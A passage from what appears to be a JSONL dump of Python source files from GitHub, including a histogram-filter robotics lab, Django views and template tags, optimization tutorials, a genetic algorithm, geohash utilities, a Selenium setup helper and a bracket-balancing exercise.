np.exp(-abs(indexes)/scale)\n exponential_dist = exponential_dist/exponential_dist.sum()\n if mirror:\n return np.roll(exponential_dist[::-1], loc)\n return np.roll(exponential_dist, loc-1)\n\n## Walking functions\ndef get_walking_noise_example_1(N):\n W = np.zeros(N)\n W[0] = 0.15\n W[1] = 0.50\n W[2] = 0.35\n return W\n\ndef get_walking_noise_example_2(N):\n W = np.zeros(N)\n W[0] = 0.15\n W[1] = 0.70\n W[2] = 0.15\n return W\n\ndef get_walking_noise_perfect_1(N):\n W = np.zeros(N)\n W[1] = 1\n return W\n\ndef get_walking_noise_perfect_3(N):\n W = np.zeros(N)\n W[3] = 1\n return W\n\n## Generative functions\ndef get_random_sample(random_variable):\n pick_random = np.random.uniform()\n sum_prob = 0\n i = 0\n while sum_prob < pick_random:\n sum_prob = sum_prob + random_variable[i][1]\n i = i + 1\n return random_variable[i-1][0]\n\n\ndef generate_sample(likelihood, W, initial_state=1, steps=37):\n current_state = initial_state-1\n sample = []\n measurements = []\n probs = W[W > 0]\n idxs = np.where([W > 0])[1]\n random_step = [(idxs[i], p) for i, p in enumerate(probs)]\n\n random_step_list = []\n real_locations = []\n N = len(likelihood[list(likelihood.keys())[0]])\n sample_stats = [None for i in range(N)]\n for step in range(steps):\n random_variable = []\n for key in likelihood.keys():\n random_variable.append((key, likelihood[key][current_state]))\n\n measure = get_random_sample(random_variable)\n measurements.append(measure)\n sample.append([current_state, measure])\n real_locations.append(current_state)\n if sample_stats[current_state] is None:\n sample_stats[current_state] = {}\n if measure not in sample_stats[current_state]:\n sample_stats[current_state][measure] = 0\n sample_stats[current_state][measure] = sample_stats[current_state][measure] + 1\n\n random_step_done = get_random_sample(random_step)\n random_step_list.append(random_step_done)\n current_state = (current_state + random_step_done) % N\n \n transition_hist = Counter(random_step_list)\n steps_stats = []\n for i in range(len(W)):\n if i in transition_hist:\n steps_stats.append(transition_hist[i]/steps)\n else:\n steps_stats.append(0)\n #steps_stats = [transition_hist[i]/steps for i in range(len(transition_hist))]\n return measurements, sample_stats, steps_stats, real_locations\n\n## Histogram filter functions\n\ndef convolve(x1, x2):\n conv = np.zeros(len(x1))\n for i in range(len(x2)):\n conv = conv + x2[i]*np.roll(x1, i)\n return conv\n\ndef update(p, X, likelihood):\n # p: prior probability\n # X: Measurement. Measured position\n # posterior not normalized\n posterior = likelihood[X]*p\n # Normalize it\n normalized = posterior/posterior.sum()\n return normalized\n\ndef prediction(posterior, transition):\n # posterior: posterior probability distribution\n # transition: transition probability distribution\n return convolve(posterior, transition)\n\ndef get_hist_circular_mean_var(hist, zero_centered=True):\n N = len(hist)\n idx = np.linspace(1, N, N)\n x = np.linspace(0, 2*np.pi*(N-1)/N, N)\n x_cos = np.cos(x)\n x_sin = np.sin(x)\n mean_cos = (hist*x_cos).sum()\n mean_sin = (hist*x_sin).sum()\n mean_angle = np.arctan2(mean_sin, mean_cos)\n mean = N*mean_angle/(2*np.pi)\n if mean < 0:\n mean = mean + N\n mean = mean + 1\n deltas = abs(idx - mean)\n deltas[deltas > (N/2.0)] = deltas[deltas > (N/2.0)]-N\n variance = (hist*(deltas**2)).sum()\n if zero_centered:\n if mean > N/2:\n mean = mean - N\n return mean, variance\n\ndef run_histogram_filter(W, measurements, likelihood, prior):\n N = len(prior)\n mean, variance = get_hist_circular_mean_var(prior)\n mean_list = [mean]\n var_list = [variance]\n mean_list_pred = [mean]\n var_list_pred = [variance]\n N_mult = 1\n N_mult_pred = 1\n for i in range(len(measurements)):\n posterior = update(prior, measurements[i], likelihood)\n mean, variance = get_hist_circular_mean_var(posterior)\n predicted = convolve(posterior, W)\n prior = predicted\n mean_pred, variance_pred = get_hist_circular_mean_var(prior)\n\n if len(mean_list) > 1:\n while abs(mean_list[-1]-mean) > (N/2):\n #print(abs(mean_list[-1]-mean), mean)\n mean = mean + N_mult*N\n\n if len(mean_list_pred) > 1:\n while abs(mean_list_pred[-1]-mean_pred) > (N/2):\n mean_pred = mean_pred + N_mult_pred*N\n\n mean_list.append(mean)\n var_list.append(variance)\n mean_list_pred.append(mean_pred)\n var_list_pred.append(variance_pred)\n return posterior, mean_list, var_list, mean_list_pred, var_list_pred\n\n## Ploting functions\ndef plot_estimations(mean_list, var_list, mean_list_pred, var_list_pred, fr=0, to=-1):\n if to < 0:\n to = len(mean_list)\n plt.plot(mean_list[fr:to], color='b')\n mean_list_pred_1 = np.array(mean_list_pred)-1\n plt.plot((mean_list_pred_1)[fr:to], color='r')\n plt.plot((mean_list+np.sqrt(var_list))[fr:to], color='g')\n plt.plot((mean_list-np.sqrt(var_list))[fr:to], color='g')\n plt.plot((mean_list_pred_1+np.sqrt(var_list_pred))[fr:to], color='y')\n plt.plot((mean_list_pred_1-np.sqrt(var_list_pred))[fr:to], color='y')\n plt.show()\n\ndef plot_distribution(data, title='', fig=None, color='b', str_indexes=None, rotation=0, mark=None):\n N = len(data)\n indexes = np.linspace(1, N, N)\n if fig is None:\n fig, ax = plt.subplots(figsize=(20, 3))\n width = 1/1.5\n plt.bar(indexes, data, width=width, color=color)\n plt.xticks(rotation=rotation)\n if not str_indexes == -1:\n if str_indexes is None:\n plt.xticks(indexes)\n else:\n plt.xticks(indexes, str_indexes)\n plt.title(title)\n if mark is not None:\n plt.bar(mark, data[mark-1], width=width, color='r')\n\nfrom ipywidgets import *\nfrom scipy.stats import entropy\n\ndef histogram_filter(W, measurements, likelihood, prior):\n # W: transition probability distribution\n # measurements: It is a list of observations. The i'th observation Xi = measurements[i]\n # likelihood: It is a dict where likelihood[Xi] is the likelihood given observation Xi\n # prior: The initial distribution, normaly with normalized entropy of 1 (Maximun confusion)\n normalized_entropy = []\n mean_array = []\n var_array = []\n for i in range(len(measurements)):\n posterior = update(prior, measurements[i], likelihood)\n normalized_entropy.append(entropy(posterior, base=2)/np.log2(len(prior)))\n mean, variance = get_hist_circular_mean_var(posterior)\n mean_array.append(mean)\n var_array.append(variance)\n predicted = prediction(posterior, W)\n prior = predicted\n return posterior, predicted, normalized_entropy, mean_array, var_array\n\nimport matplotlib.patches as mpatches\ndef plot_histogram_entropy_std(measurements, transition, likelihood, prior, n_steps=1, real_positions=None): \n N = len(prior)\n posterior, predicted, normalized_entropy, mean_array, var_array\\\n = histogram_filter(transition,\n measurements[:n_steps],\n likelihood,\n prior=np.ones(N)/N)\n f = plt.figure(figsize=(20, 10))\n plt.subplot(3, 1, 1)\n plot_distribution(posterior, title='normalized $P(S=k|X)$ - Posterior -', fig=f)\n #plt.show()\n #plt.figure(figsize=(20,5))\n plt.subplot(3, 2, 3)\n plt.title(\"Normalized entropy\")\n plt.plot(normalized_entropy)\n plt.subplot(3, 2, 4)\n plt.title(\"Standard deviation\")\n plt.plot(np.array(var_array)**(0.5))\n if (real_positions is not None) and (type(measurements[0]) is not int):\n real_positions = real_positions[:n_steps]\n plt.subplot(3, 1, 3)\n measurements_options = list(set(measurements[:n_steps]))\n color = ['r','b','g','y','k']\n map_dict = {}\n for i,meas in enumerate(measurements_options):\n map_dict[meas] = color[i]\n for i, measurement in enumerate(measurements[:n_steps]):\n plt.scatter(i, real_positions[i], color=map_dict[measurement], label=measurement)\n plt.plot(real_positions)\n class_colours = color[:len(measurements_options)]\n recs = []\n for i in range(0,len(class_colours)):\n recs.append(mpatches.Rectangle((0,0),1,1,fc=class_colours[i]))\n plt.legend(recs,measurements_options,loc=4)\n plt.xlabel('iteration')\n plt.ylabel('Robot position')\n elif (real_positions is not None):\n plt.subplot(3, 1, 3)\n plt.plot(measurements[:n_steps], label=\"Robot location measured\")\n plt.plot(real_positions[:n_steps], label=\"Robot real location\")\n plt.xlabel('iteration')\n plt.ylabel('Robot position')\n plt.legend()\n\n plt.show()\n print(\"normalized entropy of last posterior:\", normalized_entropy[-1])\n\n\ndef plot_interactive_histogram(measurements, transition, likelihood, prior, steps, real_locations=None, initial_slider_pos=10):\n plot_histogram_result_interactive = lambda n_steps=initial_slider_pos: plot_histogram_entropy_std(measurements, transition, \n likelihood, prior,\n n_steps, real_positions = real_locations) \n\n interact(plot_histogram_result_interactive, n_steps = widgets.IntSlider(min=1, max=steps,\n step=1, value=initial_slider_pos,\n continuous_update=False))\n\n\ndef get_likelihood(N, observation_func, scale=6):\n likelihood = {}\n for X_0 in range(N):\n X = X_0 + 1\n likelihood[X] = []\n for k in range(N):\n likelihood_k = observation_func(N= N, loc = k+1, scale=scale)\n likelihood[X].append(likelihood_k[X-1])\n return likelihood\n","repo_name":"husmen/racecar-training","sub_path":"LAB9 - kalman and histogram filters/histogram_filters.py","file_name":"histogram_filters.py","file_ext":"py","file_size_in_byte":11852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14182359879","text":"import logging\n\n__author__ = \"Artur Barseghyan \"\n__copyright__ = \"2016-2022 Artur Barseghyan\"\n__license__ = \"GPL-2.0-only OR LGPL-2.1-or-later\"\n__all__ = (\n \"app_setup\",\n \"is_app_setup_completed\",\n \"LOG_INFO\",\n \"log_info\",\n \"mark_app_setup_as_completed\",\n \"skip\",\n)\n\n\nLOGGER = logging.getLogger(__name__)\n\nLOG_INFO = True\n\n\ndef log_info(func):\n \"\"\"Log some useful info.\"\"\"\n if not LOG_INFO:\n return func\n\n def inner(self, *args, **kwargs):\n \"\"\"Inner.\"\"\"\n result = func(self, *args, **kwargs)\n\n LOGGER.info(\"\\n%s\", func.__name__)\n LOGGER.info(\"============================\")\n if func.__doc__:\n LOGGER.info('\"\"\" %s \"\"\"', func.__doc__.strip())\n LOGGER.info(\"----------------------------\")\n if result is not None:\n LOGGER.info(result)\n LOGGER.info(\"\\n\")\n\n return result\n\n return inner\n\n\nSKIP = False\n\n\ndef skip(func):\n \"\"\"Simply skip the test.\"\"\"\n\n def inner(self, *args, **kwargs):\n \"\"\"Inner.\"\"\"\n if SKIP:\n return\n return func(self, *args, **kwargs)\n\n return inner\n\n\nclass AppSetup(object):\n \"\"\"Basic setup class.\n\n Created in order to avoid the app test data to be initialised\n multiple times.\n \"\"\"\n\n def __init__(self):\n self.is_done = False\n\n\napp_setup = AppSetup()\n\n\ndef is_app_setup_completed():\n \"\"\"Check if app setup is completed.\"\"\"\n return app_setup.is_done is True\n\n\ndef mark_app_setup_as_completed():\n \"\"\"Mark app setup as completed.\"\"\"\n app_setup.is_done = True\n","repo_name":"barseghyanartur/django-debug-toolbar-force","sub_path":"src/debug_toolbar_force/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"20828636842","text":"import osqp\nimport numpy as np\nfrom scipy import sparse\nimport matplotlib.pyplot as plt\nimport casadi as ca\n\n# 1st exercise\n# ========= OSQP ===========\n\nm = 1\n\n# Define problem data\nP = sparse.csc_matrix([[2, 0], [0, 2]])\nq = np.array([0, 1])\n\n\n# Create an OSQP object\nprob = osqp.OSQP()\n# Setup workspace\nprob.setup(P, q)\n\n# Solve problem\nres = prob.solve()\n\nprint(res.x)\n\n\n# ========= casadi ===========\n\nimport casadi as ca\n\nx = ca.SX.sym('x', 2)\nx1 = x[0]\nx2 = x[1]\nm=1\n\nf = x1**2 + x2**2 + m*x2\n\n# construct nlp\nnlp = {'x': x, 'f': f}\nsolver = ca.nlpsol('solver', 'ipopt', nlp)\nsol = solver()\n\n# print solutions\nprint(\"\\n ----- SOCP solution\")\nprint(\"> success =\" , solver.stats()['success'])\nprint(\"> primal solution =\" , sol['x'])\nprint(\"> objective at solution =\", sol['f'])\n\n\n\n# 2nd exercise\n# ===============================\n\nimport osqp\nimport numpy as np\nfrom scipy import sparse\n\n# Define problem data\nP = sparse.csc_matrix([[8, 0, 0], [0, 4, 0], [0, 0, 3]])\nq = np.array([1, 1, 0])\n#A = sparse.csc_matrix([[1, 1], [1, 0], [0, 1]])\n#l = np.array([1, 0, 0])\n#u = np.array([1, 0.7, 0.7])\n\n# Create an OSQP object\nprob = osqp.OSQP()\n\n# Setup workspace and change alpha parameter\nprob.setup(P, q, alpha=1.0)\n\n# Solve problem\nres = prob.solve()\n\nprint(res.x)\n\n\n# ========= casadi ===========\n\nimport casadi as ca\n\nx = ca.SX.sym('x', 3)\nx1 = x[0]\nx2 = x[1]\nx3 = x[2]\n\nf = 4*x1**2 + 2*x2**2 + x1 + x2 + x3**2\n\n# construct nlp\nnlp = {'x': x, 'f': f}\nsolver = ca.nlpsol('solver', 'ipopt', nlp)\nsol = solver()\n\n# print solutions\nprint(\"\\n ----- SOCP solution\")\nprint(\"> success =\" , solver.stats()['success'])\nprint(\"> primal solution =\" , sol['x'])\nprint(\"> objective at solution =\", sol['f'])\n\n\n# ==============================\n\n# 2nd exercise (constrained)\n# ===============================\n\nimport osqp\nimport numpy as np\nfrom scipy import sparse\n\n# Define problem data\nP = sparse.csc_matrix([[8, 0, 0], [0, 4, 0], [0, 0, 3]])\nq = np.array([1, 1, 0])\nA = sparse.csc_matrix([[1, 1, 0], [1, 0, 0], [0, 0, 1]])\nl = np.array([1, 0, 1])\nu = np.array([1, 2, 3])\n\n# Create an OSQP object\nprob = osqp.OSQP()\n\n# Setup workspace and change alpha parameter\nprob.setup(P, q, A, l, u, alpha=1.0)\n\n# Solve problem\nres = prob.solve()\n\nprint(res.x)\n\n\n# ========= casadi ===========\n\nimport casadi as ca\n\nx = ca.SX.sym('x', 3)\nx1 = x[0]\nx2 = x[1]\nx3 = x[2]\n\nf = 4*x1**2 + 2*x2**2 + x1 + x2 + x3**2\n\ng = []\ng.append(x1 + x2) # linear constrain\ng.append(x1) # second-order cone\ng.append(x3) # rotated second-order cone\n\nx0 = np.array([0, 0, 0])\nlbg = np.array([1, 0, 1])\nubg = np.array([1, 2, 3])\n\n# construct nlp\nnlp = {'x': x, 'f': f, 'g': ca.vertcat(*g)}\nsolver = ca.nlpsol('solver', 'ipopt', nlp, )\nsol = solver(x0=x0, lbg=lbg, ubg=ubg)\n\n# print solutions\nprint(\"\\n ----- SOCP solution\")\nprint(\"> success =\" , solver.stats()['success'])\nprint(\"> primal solution =\" , sol['x'])\nprint(\"> objective at solution =\", sol['f'])\n\n\n\n#%% ===========================================================================\n# Solve Rosenbrock (unconstrained)\n# =============================================================================\n# Plot non linear function ----------------------------------------------------\n[X0,X1] = np.meshgrid(np.linspace(-3.,3.,1000), np.linspace(-3.,3.,1000))\nF = np.exp(-X0**2 - X1**2) * np.sin(4 * (X0 + X1 + X0*X1**2))\n\n# Plot the function\nplt.clf()\nplt.contour(X0,X1,F)\nplt.colorbar()\nplt.jet()\nplt.xlabel(\"x0\")\nplt.ylabel(\"x1\")\nplt.ylim([-3,3])\nplt.xlim([-3,3])\n\n# define problem\nx = ca.SX.sym('x',2)\nf = ca.exp(-x[0]**2 - x[1]**2 ) * ca.sin(4*(x[0] + x[1] + x[0]*x[1]**2 ))\n\n# construct nlp\nnlp = {'x': x,'f': f}\nsolver = ca.nlpsol(\"solver\", 'ipopt', nlp)\n\n# Gradient of f\nF_grad = ca.Function('f', [x], [ca.gradient(f, x)], ['x'], ['gradient'])\nprint(F_grad)\n\n## Solve for three different starting points\nsummary = [(\"GUESS\", \"SOLUTION\", \"SOLVER STATUS\")]\nfor x_guess in [[0, 0], [0.9, 0.9], [-0.9, -0.9]]:\n # Solve the NLP and get output\n sol = solver(x0 = x_guess)\n x_opt = sol['x'].full().flatten()\n summary.append((x_guess, x_opt, solver.stats()['return_status']))\n plt.plot([x_guess[0],x_opt[0]], [x_guess[1],x_opt[1]],'ro-')\n\nprint('SUMMARY:')\nfor (x0, x_opt, status) in summary:\n print(\"%20s , %20s , %20s\" % (x0, x_opt, status))\n if not(isinstance(x_opt, str)):\n # Check optimality\n print(\" Gradient: %20s\" % (F_grad(x_opt)))\n\n# Show plot\nplt.axis([-3,3,-3,3])\nplt.show()\n\n#%% ===========================================================================\n# Solve Rosenbrock (constrained)\n# =============================================================================\nx = ca.MX.sym('x',3,1);\nf = x[0]**2 + 100*x[2]**2;\ng = x[2] + (1-x[0])**2 - x[1];\n\n# set i.c. and bounds\nw0 = [2.5,3.0,0.75] # initial guess array\nlbw = -np.inf # lower bound solution\nubw = np.inf # upper bound solution\nlbg = 0; # lower bound inequality array\nubg = 0; # upper bound inequality array\n\n# construct nlp\nnlp = {'x':x, 'f':f, 'g':g} # with constrains\nnlp = {'x':x, 'f':f} # without constrains\nsolver = ca.nlpsol('solver', 'ipopt', nlp);\nsol = solver(x0 = w0, lbx = lbw, ubx = ubw,lbg = lbg, ubg = ubg)\n\n# Solve the NLP and print solution\nprint(\"-----\")\nprint(\"> objective at solution = \", sol[\"f\"]) # > 0\nprint(\"> primal solution = \", sol[\"x\"]) # > [0, 1, 0]\nprint(\"> dual solution (x) = \", sol[\"lam_x\"]) # > [0, 0, 0]\nprint(\"> dual solution (g) = \", sol[\"lam_g\"]) # > 0","repo_name":"ltgio/process-optimization","sub_path":"tutorial_optimization.py","file_name":"tutorial_optimization.py","file_ext":"py","file_size_in_byte":5538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72907041194","text":"from random import randint\n\npopulation_size = 50\nancestor_count = 10\ngoal_string = \"Hello World!\"\npossible_chars = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !\"\nmutation_chance_percentage = 5\n\n\n# Fitness function for given node in population\ndef evaluate(node):\n matching_chars = 0\n for i in range(len(node)):\n if node[i] == goal_string[i]:\n matching_chars += 1\n return matching_chars\n\n\n# Function to find matching string using GA\ndef find_match(pop, goal):\n iterations = 0\n\n # Loop until goal string is found\n while True:\n # Evaluate current population\n for cur_node in pop.keys():\n pop[cur_node] = evaluate(cur_node)\n\n # Check for match\n for cur_node, fitness in pop.items():\n if fitness == len(goal):\n return iterations\n\n # Get best ancestors to generate next population\n ancestors = sorted(pop.items(), key=lambda x: x[1], reverse=True)[:ancestor_count]\n print(ancestors[0])\n ancestors = dict(ancestors)\n\n # Decide whether or not to mutate\n to_remove = []\n to_add = []\n for cur_node, fitness in ancestors.items():\n mutate = randint(1, 100)\n if mutate <= mutation_chance_percentage:\n rand_char = possible_chars[randint(0, len(possible_chars) - 1)]\n rand_index = randint(0, len(cur_node) - 1)\n replace_string = list(cur_node)\n replace_string[rand_index] = rand_char\n to_remove.append(cur_node)\n to_add.append(\"\".join(replace_string))\n\n for node in to_remove:\n ancestors.pop(node)\n\n for node in to_add:\n ancestors[node] = -1\n\n # Cross-breed best ancestors\n pop = {}\n for cur_node in ancestors.keys():\n for breed_node in ancestors.keys():\n if not cur_node == breed_node:\n new_node = cur_node[:6] + breed_node[6:]\n pop[new_node] = -1\n\n iterations += 1\n\n\nif __name__ == '__main__':\n # Initialise population as an empty dict\n population = {}\n\n # Generate the population randomly from possible characters\n for i in range(population_size):\n string = \"\"\n\n for j in range(len(goal_string)):\n rand = randint(0, len(possible_chars) - 1)\n string += possible_chars[rand]\n\n population[string] = -1\n\n print(find_match(population, goal_string))\n","repo_name":"jackdneilson/CS547-Advanced-Topics-in-Software-Engineering","sub_path":"handin_1/Jack_Neilson/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18622605600","text":"from django.shortcuts import render ,redirect ,reverse\r\nfrom django.http import HttpResponse ,JsonResponse\r\nfrom .models import *\r\nfrom django.core.paginator import PageNotAnInteger,Paginator,EmptyPage\r\nfrom operations.models import *\r\nfrom .forms import *\r\nfrom orgs.models import *\r\n\r\n\r\n\r\ndef CouresInfo(request):\r\n couresinfo = CourseInfo.objects.all()\r\n\r\n sort = request.GET.get('sort','')\r\n if sort:\r\n couresinfo = couresinfo.order_by('-'+sort)\r\n\r\n pagenum = request.GET.get('pagenum','')\r\n pa = Paginator(couresinfo,10)\r\n try:\r\n pages = pa.page(pagenum)\r\n except PageNotAnInteger:\r\n pages = pa.page(1)\r\n except EmptyPage:\r\n pages = pa.page(pa.num_pages)\r\n\r\n return render(request,'coures/coures.html',{\r\n 'couresinfo':couresinfo,\r\n 'pages':pages,\r\n 'sort':sort,\r\n })\r\n\r\n\r\ndef CouresDetail(request,couresid):\r\n if couresid:\r\n couresdetail = CourseInfo.objects.filter(id = couresid)[0]\r\n print(couresdetail)\r\n #点击量自动增加\r\n couresdetail.click_num += 1\r\n couresdetail.save()\r\n #获取收藏信息 如果用户存在 且收藏里有记录则改False 为 True 再把值返回给前端页面\r\n # lovecoures = False\r\n # loveorg = False\r\n # if request.user.is_authenticated():\r\n # love = UserLove.objects.filter(love_id=couresid, love_status=True, love_type=1, love_man=request.user)\r\n # if love:\r\n # lovecoures = True\r\n # loveorgs = UserLove.objects.filter(love_id=couresdetail.orginfo.id,love_status=True, love_type=2, love_man=request.user))\r\n # if loveorgs:\r\n # loveorg = True\r\n\r\n return render(request,'coures/couresdetail.html',{\r\n 'couresdetail':couresdetail,\r\n # 'lovecoures':lovecoures,\r\n # 'loveorg':loveorg,\r\n })\r\n\r\n\r\ndef CouresVideo(request,couresid):\r\n if couresid:\r\n couresinfo = CourseInfo.objects.filter(id=couresid)[0]\r\n #用户是否学习过该课程\r\n studyuser = UserCourse.objects.filter(study_man=request.user,study_course=couresinfo)\r\n #如果用户已学习过 直接返回 没有学习就保存数据\r\n if not studyuser:\r\n a = UserCourse()\r\n a.study_man = request.user\r\n a.study_course = couresinfo\r\n a.save()\r\n\r\n #学过课程的用户还学过什么\r\n coureslist = UserCourse.objects.filter(study_course=couresid)\r\n userlist = [ couresuser.study_man for couresuser in coureslist ]\r\n #排除当前所在课程的其它课程\r\n usercoureslist = UserCourse.objects.filter(study_man__in=userlist).exclude(study_course=couresid)\r\n usercoure = list(set([usercou.study_course for usercou in usercoureslist ]))\r\n #用set 集合去重\r\n print(usercoure)\r\n\r\n sort_coures = UserCourse.objects.order_by('-id')\r\n\r\n return render(request,'coures/couresvideo.html',{\r\n 'couresinfo':couresinfo,\r\n 'sort_coures':sort_coures,\r\n # 'lesson':lesson,\r\n })\r\n\r\ndef CouresComment(request):\r\n usercomment = UserCommentForm(request.POST)\r\n if usercomment.is_valid():\r\n coures = usercomment.cleaned_data['coures']\r\n content = usercomment.cleaned_data['content']\r\n\r\n a = UserComment()\r\n a.comment_course = coures\r\n a.comment_man = request.user\r\n a.comment_content = content\r\n a.save()\r\n return JsonResponse({\r\n 'status':'ok',\r\n 'msg':'ok'\r\n })\r\n else:\r\n return JsonResponse({\r\n 'status':'fail',\r\n 'msg':'error'\r\n })\r\n\r\n\r\n\r\n\r\n","repo_name":"vanllna/django","sub_path":"apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16487512338","text":"import math\nfrom collections import namedtuple\n\nfrom . import geohash\n\nBox = namedtuple(\"Box\", [\"s\", \"w\", \"n\", \"e\"])\n\n\ndef geohash_bbox(gh):\n ret = geohash.bbox(gh)\n return Box(ret[\"s\"], ret[\"w\"], ret[\"n\"], ret[\"e\"])\n\n\ndef bbox(lat, lon, radius):\n lat_delta = radius * 360 / 40000\n lon_delta = lat_delta / math.cos(lat * math.pi / 180.0)\n return Box(lat - lat_delta, lon - lon_delta, lat + lat_delta, lon + lon_delta)\n\n\ndef overlap(a1, a2, b1, b2):\n return a1 < b2 and a2 > b1\n\n\ndef box_overlap(box1: Box, box2: Box):\n return overlap(box1.s, box1.n, box2.s, box2.n) and overlap(\n box1.w, box1.e, box2.w, box2.e\n )\n\n\ndef compute_geohash_tiles(lat, lon, radius, precision):\n bounds = bbox(lat, lon, radius)\n center = geohash.encode(lat, lon, precision)\n\n stack = set()\n checked = set()\n\n stack.add(center)\n checked.add(center)\n\n while stack:\n current = stack.pop()\n for neighbor in geohash.neighbors(current):\n if neighbor not in checked and box_overlap(geohash_bbox(neighbor), bounds):\n stack.add(neighbor)\n checked.add(neighbor)\n return checked\n\n\ndef geohash_overlap(lat, lon, radius, max_tiles=9):\n result = []\n for precision in range(1, 13):\n tiles = compute_geohash_tiles(lat, lon, radius, precision)\n if len(tiles) <= 9:\n result = tiles\n precision += 1\n else:\n break\n return result\n","repo_name":"BeardedTinker/Home-Assistant_Config","sub_path":"custom_components/blitzortung/geohash_utils.py","file_name":"geohash_utils.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":336,"dataset":"github-code","pt":"72"} +{"seq_id":"41230145696","text":"from dpath.util import merge\nfrom selenium import webdriver\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\nfrom .config import Config\nfrom .utils import maybe_bool, construct_dict\n\n\ndef initialize(driver_url):\n if len(Config.DESIRED_CAPABILITIES) == 0:\n options = webdriver.ChromeOptions()\n options.add_experimental_option('prefs', {'intl.accept_languages': 'ja_JP'})\n cap = options.to_capabilities()\n else:\n cap = {}\n for k, v in [cap.split(\"=\") for cap in Config.DESIRED_CAPABILITIES]:\n k = k.strip(\"\\\"'\")\n v = maybe_bool(v.strip(\"\\\"'\"))\n merge(cap, construct_dict(k, v))\n\n if Config.HTTP_PROXY or Config.HTTPS_PROXY or Config.NO_PROXY:\n proxy = Proxy()\n proxy.sslProxy = Config.HTTPS_PROXY\n proxy.httpProxy = Config.HTTP_PROXY\n proxy.noProxy = Config.NO_PROXY\n proxy.proxyType = ProxyType.MANUAL\n proxy.add_to_capabilities(cap)\n\n driver = webdriver.Remote(\n command_executor=driver_url,\n desired_capabilities=cap)\n\n return driver\n","repo_name":"side-runner-py/side-runner-py","sub_path":"side_runner_py/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"69896367914","text":"# blog/templatetags/blog_tags.py\n\n# Django modules\nfrom django import template\n\n# Locals\nfrom apps.blog.models import Post, Category, Tag \n\n# Template library\nregister = template.Library()\n\n# Register your template here.\n\n\n@register.inclusion_tag('blog/shared/aside_popular_posts.html')\ndef show_popular_posts(count=5):\n\tpopular_posts = Post.objects.filter(post_status='published', post_type='featured').order_by('-post_view')[:count]\n\t# print(popular_posts) # It works\n\tcontext = {'popular_posts':popular_posts}\n\treturn context\n\n\n@register.inclusion_tag('blog/shared/aside_category.html')\ndef show_posts_by_category():\n\tcategories = Category.objects.all()\n\t# print(categories) # It works\n\tcontext = {'categories':categories}\n\treturn context\n\n\n@register.inclusion_tag('blog/shared/aside_tags.html')\ndef show_tags():\n\ttags = Tag.objects.all()\n\tprint(tags) # It works\n\tcontext = {'tags':tags}\n\treturn context\n\n","repo_name":"gurnitha/2022-django4-blog-fantom","sub_path":"apps/blog/templatetags/template_tags_blog.py","file_name":"template_tags_blog.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12413249100","text":"import pytest\n\nfrom cardbuilder.common import Fieldname, Language\nfrom cardbuilder.exceptions import WordLookupException\nfrom cardbuilder.input.word import Word, WordForm\nfrom cardbuilder.lookup.data_source import DataSource\nfrom cardbuilder.lookup.ja_to_en import Jisho\nfrom tests.lookup.data_source_test import DataSourceTest\n\n\nclass TestJisho(DataSourceTest):\n\n def get_data_source(self) -> DataSource:\n return Jisho()\n\n def test_lookup(self):\n jisho = Jisho()\n inu_data = jisho.lookup_word(Word('犬', Language.JAPANESE), '��')\n\n assert(inu_data[Fieldname.PART_OF_SPEECH].get_data().lower() == 'noun')\n assert(inu_data[Fieldname.FOUND_FORM].get_data() == '犬')\n\n with pytest.raises(WordLookupException):\n jisho.lookup_word(Word('イヌ', Language.JAPANESE), 'イヌ')\n\n inu_katakana_data = jisho.lookup_word(Word('イヌ', Language.JAPANESE, [WordForm.PHONETICALLY_EQUIVALENT]), 'イヌ')\n assert(inu_katakana_data[Fieldname.PART_OF_SPEECH].get_data().lower() == 'noun')\n assert(inu_katakana_data[Fieldname.FOUND_FORM].get_data() == '犬')\n\n # exception check\n jisho.lookup_word(Word('デブ', Language.JAPANESE), 'デブ')\n\n def test_reading_gen(self):\n simple_reading = Jisho._detailed_reading('犬')\n complex_reading = Jisho._detailed_reading('水飲み場')\n\n assert(simple_reading == '犬[いぬ]')\n assert(complex_reading == '水[みず] 飲[の]み 場[ば]')\n\n\n\n\n\n\n","repo_name":"Mindful/cardbuilder","sub_path":"tests/lookup/ja_to_en/test_jisho.py","file_name":"test_jisho.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"32626021898","text":"#stck problem\n#bracket balancing: Check if the open bracket is closed\n\n# user_input = input(\"Type a bracket sequence.\")\n# from inspect import stck, stck\n\n\nuser_input = \"() (()[()])\"\nprint(user_input)\ndef check_the_input(input):\n stck = []\n for symbol in input:\n if symbol in \"\"\"\"[({'\"\"\":\n stck.append(symbol)\n else:\n if symbol in \"\"\"\"]})'\"\"\":\n stck.pop()\n\n else:\n continue\n\n if len(stck) == 0:\n print(\"Input is good\")\n\n else:\n print(\"You forgot to close the {0}\".format(stck[-1]))\n print(stck)\ncheck_the_input(user_input)\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nuser_input = input(\"Enter your string: \")\ndef check_input(input):\n stack = []\n for char in input:\n if char in \"\"\"({[\"'\"\"\":\n stack.append(char)\n elif char in \"\"\")}]\"'\"\"\":\n stack.pop()\n\n else:\n continue\n\n if len(stack) == 0:\n print(\"input is good\")\n\n else:\n print(\"You forgot to close the 